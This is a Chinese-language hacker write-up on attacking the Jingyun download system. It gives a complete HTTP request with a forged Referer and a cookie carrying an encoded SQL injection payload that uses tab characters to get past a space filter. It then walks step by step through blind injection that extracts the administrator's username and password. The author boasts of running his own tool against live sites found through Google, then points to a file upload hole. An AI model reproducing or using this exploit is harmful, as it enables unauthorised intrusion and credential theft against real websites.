惊云下载系统又暴惊天漏洞（2）

到底如何利用呢？当然最好是搞定管理员的用户和密码拉。

我用WSE抓包后，整理如下（以我自己的机器做实验)

      POST /admin/edit.asp HTTP/1.1
      Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
1      Referer: http://localhost/
      Accept-Language: zh-cn
      Content-Type: application/x-www-form-urlencoded
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE2)
      Host: localhost
      Content-Length: 125
      Connection: Keep-Alive
      cache-Control: no-cache
2      Cookie:iscookies=0; JyDownUserDj=0; JyDownUserName=aaaaaaaa'％09union％09select％09*％09from％09userinfo％09where％09id％3D1％09and％09len(pwd)％3D1％09and％09'1％3D1

     type=save&pwd=tttttt3333tttt&pwd1=&pwd2=&oicq=33337788&email=fsadf@fsf.com&homepage=&qm=&softurl=&b1=％C8％B7％C8％CF％D0％DE％B8％C4

上面两处是需要注意的，有序号。其他地方随便添，按照我上面的就行了。

1处是为了逃避上面讲到的防网页不是从点击近来的,把这个值设为网址就行了，没什么好讲的。
2处是最关键的，我上面提到了COOKIE欺骗，这里不但要欺骗还有注入。

JyDownUserName这个值我们把它设为了
aaaaaaaa' union select * from userinfo where id=1 and len(pwd)=1 and '1=1
这个。上面是经过编码的。其中％09是TAB键的编码，为了躲过空格过滤。它和空格是等价的，真的谢谢MS工程师开发软件总是为用户着想，生怕功能不强。
程序作者只过滤了空格欠考虑。

把上面的值代入到原程序总就变为了（应该学过代数啊，呵呵）

select * from UserInfo where user='aaaaaaaa' union select * from userinfo where id=1 and len(user)=1 and '1=1'

那个a串没什么意义，就是为了使前面语句为假，没有这个用户就行了，可以是任意特殊字符串。后面的SELECT是重点。

ID=1是猜id为1的用户，其实就是管理员用户。不过有的管理员可能改了，那就不灵了。猜他的长度是不是1。

很显然是1可能性很小，不要紧，猜错了，会返回“错误:....用户资料读取错误,请重新登陆!”中间省了一部分。

我们把语句换成

select * from UserInfo where user='aaaaaaaa' union select * from userinfo where id=1 and len(user)=2 and '1=1'

返回“错误:....用户资料读取错误,请重新登陆!”，看来用户名长度也不是2，再换。

换到5是返回 "错误:原密码错误!"，看来用户名长度就是5了。同样方法猜出密码长度7。

该猜字符。

select * from UserInfo where user='aaaaaaaa' union select * from userinfo where id=1 and asc(mid(user,1,1)=40 and '1=1'

上面的语句大家能看懂吧？用mid函数是截取一个字符，然后转换成ASCII码，再和40比较。返回错误，说明user的第一个字符ASCII值不是40。

猜到97的时候返回"错误:原密码错误!",说明用户名第一个字符是a 。

以此类推，猜出user是admin，pwd是abcdefg.管理员的用户密码猜出来了。

上面的过程显然不可能手工输入和猜测，必须依靠工具。现成的也没有这种工具，鄙毕人就抽了宝贵的打牌（QQ升级）时间了写了个程序，很快就猜出来了。上面是方法。

我用我写的程序在网上实验，真是无往不利。就是在GOOGLE上搜惊云系统，管理员很快猜出来了。

我登陆一个网站后，发现有个地方可以上传文件。我回过头读源代码，发现了和动网一样的文件上传漏洞，都是在路径上没做检查，允许远程命名文件名。